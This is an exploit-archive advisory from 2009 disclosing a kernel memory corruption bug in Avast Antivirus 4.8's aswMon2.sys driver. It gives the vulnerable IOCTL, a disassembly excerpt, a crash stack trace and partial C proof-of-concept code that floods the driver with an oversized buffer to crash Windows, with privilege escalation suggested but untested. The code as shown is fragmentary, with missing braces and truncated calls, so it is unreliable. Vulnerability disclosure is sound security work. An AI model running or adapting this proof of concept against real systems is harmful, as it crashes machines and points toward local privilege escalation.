Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation by Evilcry - Kernel memory corruption and Local Privilege Escalatio
Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation
# Title: Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Evilcry
# Published: 2009-09-23
# Verified: yes
view source
Source: https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php
-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->
Author: Giuseppe 'Evilcry' Bonfa'
***Disclosure Timeline***
Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009<br>
Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009<br><br>
After various mails about publishing date
ignored, here the Public Disclosure.
Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation
Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that propagates
on the system with a BSOD and potential risk of Privilege Escalation.<br><br>
00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed<br>
00010F77 jnz loc_111AC<br>
00010F7D mov esi, [ebp+SourceString]<br>
00010F80 cmp [esi], ebx<br>
00010F82 mov [ebp+arg_C], ebx<br><br>
Affected IOCTL is B2C80018<br><br>
Transfer Type: METHOD_BUFFERED<br><br>
WARNING: Stack unwind information not available. Following frames may be wrong.<br>
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa<br>
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251<br>
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712<br>
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793<br><br>
f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251<br>
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04<br>
f76f5770 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5774 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5778 41414141 41414141 41414141 41414141 0x41414141<br>
f76f577c 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5780 41414141 41414141 41414141 41414141 0x41414141<br>
/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption<br>
* Author: Giuseppe 'Evilcry' Bonfa'<br>
* E-Mail: evilcry _AT_ gmail _DOT_ com<br>
* Website: http://evilcry.netsons.org<br>
* http://evilcodecave.blogspot.com <br>
* http://evilfingers.com<br>
* Vendor: Notified<br>
* No L.P.E. for kiddies<br>
* /<br><br>
#define WIN32_LEAN_AND_MEAN<br>
#include < windows.h><br>
#include < stdio.h><br><br>
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab<br>
WCHAR DeviceName[MAX_PATH];<br>
HANDLE hDevice;<br>
if ((GetVersion() & 0xFF) >= 5) <br>
wcscpy(DeviceName, L"\\\\.\\Global\\");<br>
} <br>
else <br>
wcscpy(DeviceName, L"\\\\.\\");<br>
wcscat(DeviceName, DriverName);<br>
printf("Opening.. %S\n", DeviceName);<br>
hDevice = CreateFileW(DeviceName, GENERIC_READ | <br>
if (hDevice == INVALID_HANDLE_VALUE)<br>
printf("CreateFile() ERROR %d\n", GetLastError());<br>
return FALSE;<br>
*lphDevice = hDevice;<br>
return TRUE;<br>
int main()<br>
HANDLE hDev = NULL;<br>
DWORD Junk;<br>
printf("Unable to access aswMon");<br>
char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | <br>
if (Buff)<br>
memset(Buff, 'A', 0x288);<br>
printf("DeviceIoControl Executed..\n"); <br>
} <br>
printf("VirtualAlloc() ERROR %d\n", GetLastError());<br>
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